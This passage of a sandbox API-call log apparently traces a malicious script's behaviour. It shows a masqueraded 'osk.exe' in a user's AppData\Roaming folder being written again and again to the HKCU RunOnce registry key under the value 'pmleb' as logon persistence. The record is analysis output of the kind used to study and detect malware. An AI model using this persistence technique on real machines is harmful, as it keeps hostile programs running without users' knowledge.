pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.378] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.378] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.378] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.378] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, 
riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.378] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.378] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.379] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x76 [0080.379] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.379] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x77 [0080.379] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), 
pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.380] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x76 [0080.380] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.380] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.380] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.380] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.380] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.380] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.380] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.380] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 
lpUsedDefaultChar=0x0) returned 54 [0080.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.381] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.381] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.381] RegCloseKey (hKey=0x280) returned 0x0 [0080.381] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.381] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.381] SetTimer (hWnd=0x20280, nIDEvent=0x2076, uElapse=0xa, lpTimerFunc=0x0) returned 0x2076 [0080.381] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.392] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.392] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.392] KillTimer (hWnd=0x20280, uIDEvent=0x2076) returned 1 [0080.393] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.393] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.393] IUnknown:Release (This=0x787518) returned 0x1 [0080.393] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) 
returned 0x0 [0080.393] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.393] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.393] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.393] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.393] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.393] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, 
[7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.393] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.394] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.394] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x77 [0080.394] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.394] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x78 [0080.394] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.395] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x77 [0080.395] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.395] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.395] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.395] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.395] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.395] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.395] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.395] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.396] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.396] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.396] RegCloseKey (hKey=0x280) returned 0x0 [0080.396] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.396] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.396] SetTimer (hWnd=0x20280, nIDEvent=0x2077, uElapse=0xa, lpTimerFunc=0x0) returned 0x2077 [0080.396] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.408] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.408] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.408] KillTimer (hWnd=0x20280, uIDEvent=0x2077) returned 1 [0080.408] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.408] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.409] IUnknown:Release (This=0x787518) returned 0x1 [0080.409] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.409] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.409] FileSystemObject:IDispatch:Invoke (in: 
This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.409] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.409] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.409] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.409] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.409] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.409] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.409] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x78 [0080.409] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.409] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x79 [0080.409] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.410] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x78 
[0080.410] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.410] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.411] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.411] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.411] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.411] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.411] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.411] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.411] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.411] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.411] RegCloseKey (hKey=0x280) returned 0x0 [0080.411] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.412] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.412] SetTimer (hWnd=0x20280, nIDEvent=0x2078, uElapse=0xa, lpTimerFunc=0x0) returned 0x2078 [0080.412] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.423] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.423] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.424] KillTimer (hWnd=0x20280, uIDEvent=0x2078) returned 1 [0080.424] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.424] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.424] IUnknown:Release (This=0x787518) returned 0x1 [0080.424] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.424] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.424] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 
